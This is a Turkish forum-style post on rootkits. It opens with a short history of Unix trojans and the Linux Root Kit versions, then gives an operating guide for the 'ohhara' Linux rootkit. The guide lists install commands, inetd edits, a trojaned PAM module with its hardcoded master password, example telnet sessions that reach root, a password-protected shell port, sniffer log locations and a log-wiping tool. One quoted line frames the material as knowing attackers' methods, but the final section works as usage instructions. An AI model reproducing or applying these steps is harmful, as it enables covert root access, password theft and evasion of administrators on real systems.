Rootkit nedir?
Rootkit'ler hacker'lara sistemlerde bir arka kapı sağlayan zararlı yazılımlardır. Bu sayede hacker sızdığı sistemde yöneticinin tüm haklarına sınırsızca sahip olur ve bunu çeşitli bilgileri çalmak ya da sistemde çeşitli işlemleri yürütmek için kullanır.



Alıntı:
UNIX TROJANLARIN TARİHİNE KISA BİR BAKIŞ

1980li yıllarda Unix sisteminin üzerinde neler olduğunu belirlemek çok zor değildi.

"last" komutu davetsiz misafirin sistemde hangi hesapları(account) kullandığını nereden bağlandığını gösterir.
"ls" komutu sistemde bulunan dosya/dizinleri gösterir. "ps" çalışan programları (sniffer) password kırıcı programları ve davetsiz misafirin çalıştırdığı herhangi bir dosyasını listeler.
"netstat" komutu network bağlantılarını ve bilgi akışını sağlayan portları gösterir.
"ifconfig" komutu network kartının durumunu göstererek sistemin PROMISC modda olup olmadığını bildirir.

Kısaca sistemin güvende olup olmadığı sana kolaylıkla bildirilirdi.

İlerleyen zamanlarda akıllı hackerlar sistem durumunu takip edecek ve bunla birlikte kendi aktivitelerini gizleyecek yöntemler geliştirdiler. Bu metodlar 2600 ve Phrack gibi elektronik dergilerde yayınlandı.

Örneğin "Hiding Out Under Unix" (Phrack Volume Three25 Mart 1989) isimli yazıda /etc/wtmp dosyasının düzenlenerek tüm login kayıtlarının nasıl temizleneceği bir kodla anlatılmıştı.
Zaman ilerledikçe akıllı programcılar "ls" "ps" "netstat" gibi önemli sistem
komutlarına trojan yerleştirmeyi başardılar.

Linux Root Kit versiyon 3 (lrk3) 1996 Aralık ayında yeni özelliklerle birlikte yayınlandı.
Kendini aktivitelerini gizleyerek sniff ile sistemdeki şifreleri
yakalayabiliyordu. Bu RootKit x86 tabanlı PClerde Linux üzerinde çalışıyor.


1998 Kasım ayındada Linux Root Kit version 4 (lrk4) duyuruldu.
Bu versiyona yeni özellikler eklenmişti. Bunlar:
"pidof" - "killall" (belirtilen süreci(proses) öldürme) "find" (Belirtilen tip isim tarih gibi durumlara göre dosyaları listemele) "top" (sürecleri gösterme) "crontab" (Periyodik olarak istenilen işlemleri belli zamanda gerçekleştirme)

Alıntı:
Bir hackeri yakalamak için onun araç ve teknikleri bilmek gerekir. Bir hackerin ilk yapacağı işlerin başında sistem yöneticisinden olabildiğince saklanmak ve farkedilmemektir. Bu kapsamda kullanılan araçların başında rootkit araçları gelmektedir..
Rootkitler birçok araçların bileşmesinden oluşur.
Bu araçlar sistemdeki aktiviteleri saklayarak yukarıda belirtildiği gibi sistem yöneticisini tarafından farkedilmeyi en aza indirirler.

Alıntı:
Örnek Rootkit(ohhara-rootkit):

1. ohhara rootkit nedir?
ohhara rootkit linux için bir backdoor (x86redhat 6.0 da test edilmiştir).

2. ohhara rootkit nasıl sisteme kurulur?
cd bin/glibc2.1
./install-ohhara-rootkit
vi /etc/inetd.conf dosyası düzenlenerek in.telnetd kısmı telnetd olarak değiştirilir)
killall -HUP inetd


3. ohhara rootkitin sistemden silinmesi?
cd bin/glibc2.1
./uninstall-ohhara-rootkit
vi /etc/inetd.conf dosyası düzenlenerek telnetd kısmı in.telnetd olarak değiştirilir)
killall -HUP inetd
vi /etc/rc.d/rc.local dosyasında in.inetd ve in.smbd kısmı silinir)


4. ohhara rootkitin kullanılması?
/lib/security/pam_pwdb.so
Trojan pam. Herhangi bir loginle 'gkfkqo79' passwordu ile sisteme girilir.
$ telnet rootkit_kurulmus_sistem.com
Trying xxx.xxx.xxx.xxx...
Connected to rootkit_kurulmus_sistem.com
Escape character is '^]'.
login: bin
Password: ( gkfkqo79 )
bash$ whoami
bin
bash$ su root
Password: ( gkfkqo79 )
bash# whoami
root
bash#
----------
Linux sniffer ---> /usr/sbin/in.smbd
Linux sniffer logları ---> /var/lock/subsys/...datafile.../...datafile.../in.smbd.log
Shell Port:30464 /usr/sbin/in.inetd ( password 'gkfkqo79' dur )
----------
$ telnet rootkit_kurulmus_sistem.com 30464
Trying xxx.xxx.xxx.xxx...
Connected to rootkit_kurulmus_sistem.com
Escape character is '^]'.
gkfkqo79
whoami;
root
----------
Log silinmesi ( zap2 ) /usr/sbin/fixdate